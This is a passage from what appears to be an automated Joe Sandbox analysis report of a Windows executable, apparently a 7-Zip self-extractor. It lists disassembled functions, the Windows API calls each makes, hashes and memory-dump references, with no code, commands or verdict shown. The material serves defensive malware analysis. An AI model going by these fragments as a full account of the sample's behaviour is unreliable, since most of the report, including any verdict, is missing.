                                                                                            • API ID: ErrorLast_beginthreadex
                                                                                            • String ID:
                                                                                            • API String ID: 4034172046-0
                                                                                            • Opcode ID: e5ca857e6cae9760b500a95e192be9ea992c298de85bf840c792a1269a380ec9
                                                                                            • Instruction ID: fe95790bd269afcad05a26a3721163fc0b830ac61c9b3c5b6bbddf8a66cf2d64
                                                                                            • Opcode Fuzzy Hash: e5ca857e6cae9760b500a95e192be9ea992c298de85bf840c792a1269a380ec9
                                                                                            • Instruction Fuzzy Hash: 12D05EF6400208BFDF01DFE0DC05CAB3BADEB08204B004464FD05C2150E632DA108B60
                                                                                            Function 0040CC59 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1812314642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1812300314.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812332677.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812348112.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_ErbgterT2R.jbxd
                                                                                            Similarity
                                                                                            • API ID: H_prolog
                                                                                            • String ID:
                                                                                            • API String ID: 3519838083-0
                                                                                            • Opcode ID: e8864bf39b3a1c941500cd6d38dedcba990c3b7db4eb5411aa9ab2a8414fad35
                                                                                            • Instruction ID: 312fbe8762c42e8d4a239ae194adb86e93363bc1e5443e54fb58aca6058f63a2
                                                                                            • Opcode Fuzzy Hash: e8864bf39b3a1c941500cd6d38dedcba990c3b7db4eb5411aa9ab2a8414fad35
                                                                                            • Instruction Fuzzy Hash: 70D05EB2A04108FBE7109F85D946BEEFB78EB80399F10823FB506B1150D7BC5A0196AD
                                                                                            Function 0040DADC Relevance: 1.5, APIs: 1, Instructions: 18fileCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • ReadFile.KERNELBASE(?,?,?,00000000,00000000), ref: 0040DAF2
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1812314642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1812300314.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812332677.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812348112.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_ErbgterT2R.jbxd
                                                                                            Similarity
                                                                                            • API ID: FileRead
                                                                                            • String ID:
                                                                                            • API String ID: 2738559852-0
                                                                                            • Opcode ID: 05e1a1911e5ec75f7d6758f34865a5827037a9c860dec67033daab0b9cfe5943
                                                                                            • Instruction ID: c05821c64f4412cbb188b0f884d423eaa3d686fb1c941f6ac6705c8b1bb703da
                                                                                            • Opcode Fuzzy Hash: 05e1a1911e5ec75f7d6758f34865a5827037a9c860dec67033daab0b9cfe5943
                                                                                            • Instruction Fuzzy Hash: 58E0EC75211208FFDB01CF90CD01FDE7BBDFB49755F208058E90596160C7759A10EB54
                                                                                            Function 0040DB6A Relevance: 1.5, APIs: 1, Instructions: 9timeCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SetFileTime.KERNELBASE(?,?,?,?,0040DB94,00000000,00000000,?,0040123C,?), ref: 0040DB78
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1812314642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1812300314.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812332677.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812348112.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_ErbgterT2R.jbxd
                                                                                            Similarity
                                                                                            • API ID: FileTime
                                                                                            • String ID:
                                                                                            • API String ID: 1425588814-0
                                                                                            • Opcode ID: d3a1cd3220883f1d47adb6259c26a1719b9664e7d8bae69288c7dd66fbb4bdaa
                                                                                            • Instruction ID: c6000770aa4fb4c72b4925fc402daec6625791e8065b7518697746b49206ca3e
                                                                                            • Opcode Fuzzy Hash: d3a1cd3220883f1d47adb6259c26a1719b9664e7d8bae69288c7dd66fbb4bdaa
                                                                                            • Instruction Fuzzy Hash: 40C04C3A199105FF8F020F70CD04C1ABBA2AB95722F10C918B199C4070CB328424EB02
                                                                                            Function 0040E9F7 Relevance: 1.3, APIs: 1, Instructions: 65COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1812314642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1812300314.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812332677.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812348112.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_ErbgterT2R.jbxd
                                                                                            Similarity
                                                                                            • API ID: memmove
                                                                                            • String ID:
                                                                                            • API String ID: 2162964266-0
                                                                                            • Opcode ID: 97bd8de7a7fe9ad43a3345e9333d2138b4beb196f0434672ce39f7d09e0e15cd
                                                                                            • Instruction ID: f56dbf57367ec124b55c1fed62106b1dafce564086f6503587e0b0fbfa293862
                                                                                            • Opcode Fuzzy Hash: 97bd8de7a7fe9ad43a3345e9333d2138b4beb196f0434672ce39f7d09e0e15cd
                                                                                            • Instruction Fuzzy Hash: EA21A271A00B009FC724CFAAC88485BF7F9FF88724764896EE49A93A40E774B945CB54
                                                                                            Function 0040E5D3 Relevance: 1.3, APIs: 1, Instructions: 48COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • _CxxThrowException.MSVCRT(?,00414F84), ref: 0040E616
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1812314642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1812300314.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812332677.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812348112.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_ErbgterT2R.jbxd
                                                                                            Similarity
                                                                                            • API ID: ExceptionThrow
                                                                                            • String ID:
                                                                                            • API String ID: 432778473-0
                                                                                            • Opcode ID: 85c4e5dde0f8cee934fbe77132b2d5831568e55a053817787dcfc8e06ea2b7f6
                                                                                            • Instruction ID: f2b552c6dcb6979234feea5fe890f572eb9d388e9264680fa6f26452196acfb0
                                                                                            • Opcode Fuzzy Hash: 85c4e5dde0f8cee934fbe77132b2d5831568e55a053817787dcfc8e06ea2b7f6
                                                                                            • Instruction Fuzzy Hash: 20017171600701AFDB28CFBAD805997BBF8EF85314704496EE482D3651E374F946CB50
                                                                                            Function 0040F42D Relevance: 1.3, APIs: 1, Instructions: 25COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1812314642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1812300314.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812332677.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812348112.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_ErbgterT2R.jbxd
                                                                                            Similarity
                                                                                            • API ID: free
                                                                                            • String ID:
                                                                                            • API String ID: 1294909896-0
                                                                                            • Opcode ID: ad693850b0beb581ae9f70f91648a78de6b85f526a16152dd36665cc48ec9015
                                                                                            • Instruction ID: 8ccd5c106adaedd21fdabd868c2a091acccb285e2c6396e7c66228af9079aab7
                                                                                            • Opcode Fuzzy Hash: ad693850b0beb581ae9f70f91648a78de6b85f526a16152dd36665cc48ec9015
                                                                                            • Instruction Fuzzy Hash: 68E0ED311087008BEB74DA38A941F97B3DAAB14314F15893FE89AE7690EB74FC448A59
                                                                                            Function 00402F6C Relevance: 1.3, APIs: 1, Instructions: 17COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • ??2@YAPAXI@Z.MSVCRT(00000018,00000000,004044E9,?,?,?,?,?,?,?,?,?,?,00000000,00000020,?), ref: 00402F71
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1812314642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1812300314.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812332677.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812348112.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_ErbgterT2R.jbxd
                                                                                            Similarity
                                                                                            • API ID: ??2@
                                                                                            • String ID:
                                                                                            • API String ID: 1033339047-0
                                                                                            • Opcode ID: 76c2607c9262a084594b8968e60506e1095ba5b3921c342d3f15f01c827a8030
                                                                                            • Instruction ID: 194059228ff5733793a196764ebf5a0b63d959e09992ce12dff2d54d27d13516
                                                                                            • Opcode Fuzzy Hash: 76c2607c9262a084594b8968e60506e1095ba5b3921c342d3f15f01c827a8030
                                                                                            • Instruction Fuzzy Hash: 67D0A9313083121ADA5432320A09AAF84848B503A0F10083FB800A32D1DCBE8C81A299
                                                                                            Function 0040D985 Relevance: 1.3, APIs: 1, Instructions: 16COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • CloseHandle.KERNELBASE(00000001,000000FF,0040DA61,00413330,?,0040DB39,L@,40000000,00000000,00000000,00000000,0040DB50,00000000,00000001,00000001,00000080), ref: 0040D990
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1812314642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1812300314.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812332677.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812348112.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_ErbgterT2R.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseHandle
                                                                                            • String ID:
                                                                                            • API String ID: 2962429428-0
                                                                                            • Opcode ID: 5a1e794e604a6db35733be3680912b24c50de2529967425d082228c541f5af6f
                                                                                            • Instruction ID: 71cfb53d0268b44c797f7400575dcc0518408263689e7c465582b3111ebcfb94
                                                                                            • Opcode Fuzzy Hash: 5a1e794e604a6db35733be3680912b24c50de2529967425d082228c541f5af6f
                                                                                            • Instruction Fuzzy Hash: 95D0127251422156CF646E7CB8849C277D85A06334335176AF0B4E32E4D3749DCB5698
                                                                                            Function 004024C4 Relevance: 1.3, APIs: 1, Instructions: 12memoryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,0040E4D6,00020000,00000000,?,00000000,?,0040D92B,?,?,00000000,?,0040D96E), ref: 004024E0
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1812314642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1812300314.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812332677.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812348112.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_ErbgterT2R.jbxd
                                                                                            Similarity
                                                                                            • API ID: AllocVirtual
                                                                                            • String ID:
                                                                                            • API String ID: 4275171209-0
                                                                                            • Opcode ID: 076169c5b403ddfe74b0b9752022086d8412a0b80d08fe31e2627fee67d73aef
                                                                                            • Instruction ID: 23ad038ad5ccaf642d49e1102795c1c714580f299e31bec6e074b0e2bc220d86
                                                                                            • Opcode Fuzzy Hash: 076169c5b403ddfe74b0b9752022086d8412a0b80d08fe31e2627fee67d73aef
                                                                                            • Instruction Fuzzy Hash: D3C080301443007DED115F505E06B463A916B44717F508065F344540D0C7F484009509
                                                                                            Function 00411388 Relevance: 1.3, APIs: 1, Instructions: 9COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • ??2@YAPAXI@Z.MSVCRT(000000D0), ref: 0041138D
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1812314642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1812300314.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812332677.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812348112.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_ErbgterT2R.jbxd
                                                                                            Similarity
                                                                                            • API ID: ??2@
                                                                                            • String ID:
                                                                                            • API String ID: 1033339047-0
                                                                                            • Opcode ID: 08d588780a3caab37cf70573278ad1822b03e6a84bf609910ea5ba04e31b1b9c
                                                                                            • Instruction ID: d5b8b2b556814232dc2945b8f7e5995fed121ff751d048b21687cc00dda573f5
                                                                                            • Opcode Fuzzy Hash: 08d588780a3caab37cf70573278ad1822b03e6a84bf609910ea5ba04e31b1b9c
                                                                                            • Instruction Fuzzy Hash: B4B0123438914504FE5413B208013FB01800F40303F10087B5B02E4DF9FD0884805139
                                                                                            Function 00401B1F Relevance: 1.3, APIs: 1, Instructions: 5COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • VirtualFree.KERNELBASE(00000000,00000000,00008000,0040E561,?,00000004,0040E5B0,?,?,004117E5,?), ref: 00401B2A
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1812314642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1812300314.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812332677.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812348112.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_ErbgterT2R.jbxd
                                                                                            Similarity
                                                                                            • API ID: FreeVirtual
                                                                                            • String ID:
                                                                                            • API String ID: 1263568516-0
                                                                                            • Opcode ID: 727c456c664ec040fae2a494910ef8e866b16c48e489126d85a402f0e100615f
                                                                                            • Instruction ID: 5381ed20748db0b7fd93371e38984c83fa4171db9cf80dc6a42123bab5888d64
                                                                                            • Opcode Fuzzy Hash: 727c456c664ec040fae2a494910ef8e866b16c48e489126d85a402f0e100615f
                                                                                            • Instruction Fuzzy Hash: 45A002305446007ADE515B10DD05F457F516744B11F20C5547155540E586755654DA09
                                                                                            Function 0040F3FC Relevance: 1.3, APIs: 1, Instructions: 4COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1812314642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1812300314.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812332677.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812348112.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_ErbgterT2R.jbxd
                                                                                            Similarity
                                                                                            • API ID: free
                                                                                            • String ID:
                                                                                            • API String ID: 1294909896-0
                                                                                            • Opcode ID: d9246d09a93a321ccd45a7f77b4b3a05b9734a8e70a1dc2b954ba7e43b8076d7
                                                                                            • Instruction ID: 7baee4be7330d58fba6a4d3e6254b3dabd4481adb37f3967e502ba2394f26960
                                                                                            • Opcode Fuzzy Hash: d9246d09a93a321ccd45a7f77b4b3a05b9734a8e70a1dc2b954ba7e43b8076d7
                                                                                            • Instruction Fuzzy Hash:

                                                                                            Non-executed Functions

                                                                                            Function 004034C1 Relevance: 37.0, APIs: 20, Strings: 1, Instructions: 290comCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • _wtol.MSVCRT ref: 004034E5
                                                                                            • SHGetSpecialFolderPathW.SHELL32(00000000,?,CC5BE863,00000000,004177A0,00000000,00417794), ref: 00403588
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?), ref: 004035F9
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?), ref: 00403601
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?), ref: 00403609
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?), ref: 00403611
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?), ref: 00403619
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?), ref: 00403621
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?), ref: 00403629
                                                                                            • _wtol.MSVCRT ref: 0040367F
                                                                                            • CoCreateInstance.OLE32(00414BF4,00000000,00000001,00414BE4,00404F9B,.lnk,?,0000005C), ref: 00403720
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,0000005C), ref: 004037B8
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,0000005C), ref: 004037C0
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,0000005C), ref: 004037C8
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,0000005C), ref: 004037D0
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,0000005C), ref: 004037D8
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,0000005C), ref: 004037E0
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,0000005C), ref: 004037E8
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,0000005C), ref: 004037EE
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,0000005C), ref: 004037F6
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1812314642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1812300314.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812332677.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812348112.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_ErbgterT2R.jbxd
                                                                                            Similarity
                                                                                            • API ID: ??3@$_wtol$CreateFolderInstancePathSpecial
                                                                                            • String ID: .lnk
                                                                                            • API String ID: 408529070-24824748
                                                                                            • Opcode ID: cb1a116a375c0276f3cc47ebae34f017b071fc5c88c5a353f484599fe5934efa
                                                                                            • Instruction ID: c4a1d47ac56633071a1bd2db01059e5edb54ffe0bccc65637149caefe5d2277b
                                                                                            • Opcode Fuzzy Hash: cb1a116a375c0276f3cc47ebae34f017b071fc5c88c5a353f484599fe5934efa
                                                                                            • Instruction Fuzzy Hash: 8EA18A71910219ABDF04EFA1CC46DEEBB79EF44705F50442AF502B71A1EB79AA81CB18
                                                                                            Function 00401F9D Relevance: 33.4, APIs: 16, Strings: 3, Instructions: 150stringCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetLastError.KERNEL32(00000000,00000020,?), ref: 00401FEC
                                                                                            • wsprintfW.USER32 ref: 00401FFD
                                                                                            • GetEnvironmentVariableW.KERNEL32(?,00000000,00000000), ref: 00402012
                                                                                            • GetLastError.KERNEL32 ref: 00402017
                                                                                            • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 00402032
                                                                                            • GetEnvironmentVariableW.KERNEL32(?,00000000,?), ref: 00402045
                                                                                            • GetLastError.KERNEL32 ref: 0040204C
                                                                                            • lstrcmpiW.KERNEL32(00000000,00000020), ref: 00402061
                                                                                            • ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00402071
                                                                                            • ??3@YAXPAX@Z.MSVCRT(00000020), ref: 0040208F
                                                                                            • SetLastError.KERNEL32(00000000), ref: 00402098
                                                                                            • lstrlenA.KERNEL32(00413FD0), ref: 004020CC
                                                                                            • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 004020E7
                                                                                            • GetLocaleInfoW.KERNEL32(?,00001004,?,0000001F), ref: 00402119
                                                                                            • _wtol.MSVCRT ref: 0040212A
                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00413FD0,00000001,00000000,00000002), ref: 0040214A
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1812314642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1812300314.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812332677.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812348112.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_ErbgterT2R.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLast$??2@??3@EnvironmentVariable$ByteCharInfoLocaleMultiWide_wtollstrcmpilstrlenwsprintf
                                                                                            • String ID: 7zSfxString%d$XpA$\3A
                                                                                            • API String ID: 2117570002-3108448011
                                                                                            • Opcode ID: 332d11925e247980b34bd098e8b038dc96ba1155979fc83484f9ac8f636b93aa
                                                                                            • Instruction ID: 5c0681f152172bce6659d4e02be164ba9bb36eab7c70e8d4f1a0ed4420d73572
                                                                                            • Opcode Fuzzy Hash: 332d11925e247980b34bd098e8b038dc96ba1155979fc83484f9ac8f636b93aa
                                                                                            • Instruction Fuzzy Hash: 11518471604305AFDB209F74DD899DBBBB9EB08345B11407AF646E62E0E774AA44CB18
                                                                                            Function 00401BDF Relevance: 26.3, APIs: 11, Strings: 4, Instructions: 85libraryloaderCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 00401BEA
                                                                                            • FindResourceExA.KERNEL32(00000000,?,?,00000000), ref: 00401C07
                                                                                            • FindResourceExA.KERNEL32(00000000,?,?,00000409), ref: 00401C1B
                                                                                            • SizeofResource.KERNEL32(00000000,00000000), ref: 00401C2C
                                                                                            • LoadResource.KERNEL32(00000000,00000000), ref: 00401C36
                                                                                            • LockResource.KERNEL32(00000000), ref: 00401C41
                                                                                            • LoadLibraryA.KERNEL32(kernel32,SetProcessPreferredUILanguages), ref: 00401C6D
                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 00401C76
                                                                                            • wsprintfW.USER32 ref: 00401C95
